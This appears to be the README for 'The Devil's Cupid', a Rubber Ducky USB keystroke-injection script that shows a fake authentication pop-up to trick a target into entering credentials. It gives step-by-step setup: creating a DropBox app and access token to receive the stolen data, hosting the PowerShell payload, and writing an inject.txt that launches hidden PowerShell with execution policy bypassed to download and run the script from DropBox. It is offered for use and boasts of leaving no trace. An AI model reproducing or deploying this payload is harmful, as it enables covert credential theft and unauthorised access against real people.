Version 1.0
Last updated 24/02/2023
The Devil's Cupid is a Rubber Ducky script that tricks your target into sharing their credentials through a fake authentication pop up message.
It is highly adaptable and leaves no trace. (Thank you Avunit ❤️)
What you'll need:
- A Rubber Ducky USB HID Device (Also works on old gen!)
- A DropBox account.
- A DropBox Access Token
Go to your DropBox App Console and click Create app.
Configure the app as shown above. You can change Name you app to whatever you want.
After you've named your app, click Create app.
Once your app is created, navigate to the Permissions tab.
You need to enable:
- files.metadata.write
- files.content.write
- files.content.read
- file_requests.write
After making those changes, click Submit at teh bottom of the page to apply them.
Navigate back to the Settings tab.
Under Generate access token click Generate.
You will get a unique access token. Do not share it with anyone!
Copy the token. You will need it in the next step.
Open devilsCupid.ps1 and edit $DropBoxAccessToken = "<YOUR DROPBOX ACCESS TOKEN HERE>".
Replace <YOUR DROPBOX ACCESS TOKEN HERE> with your token.
For example, if your access token is ...gwireg3hiu6rg8asasfsads2ad... it should look like this:
$DropBoxAccessToken = "...gwireg3hiu6rg8asasfsads2ad...".
Save the file.
Go to your DropBox and upload your modified devilsCupid.ps1 to it.
Once it's done uploading, click Copy link.
The link should look something like https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=0.
Open inject.txt.
It will look like this:
DELAY 1000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr LINK_TO_YOUR_DEVILSCUPID.PS1; invoke-expression $pl
ENTERReplace LINK_TO_YOUR_DEVILSCUPID.PS1 with the link you've copied in the previous step.
VERY IMPORTANT: Replace the end dl=0 with dl=1.
The modified link should look like https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=1.
The modified inject.txt should look something like this:
DELAY 1000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=1; invoke-expression $pl
ENTERSave the changes.
Navigate to Ducktoolkit.com. Credits to James Hall & Kevin Breen for this awesome tool ❤️
Paste your modified inject.txt code in the Duck Code box.
Select the keyboard layout under Language tab.
Click Encode Payload.
After encoding click Download inject.bin.
Put the inject.bin file on your Rubber Ducky.
You're done!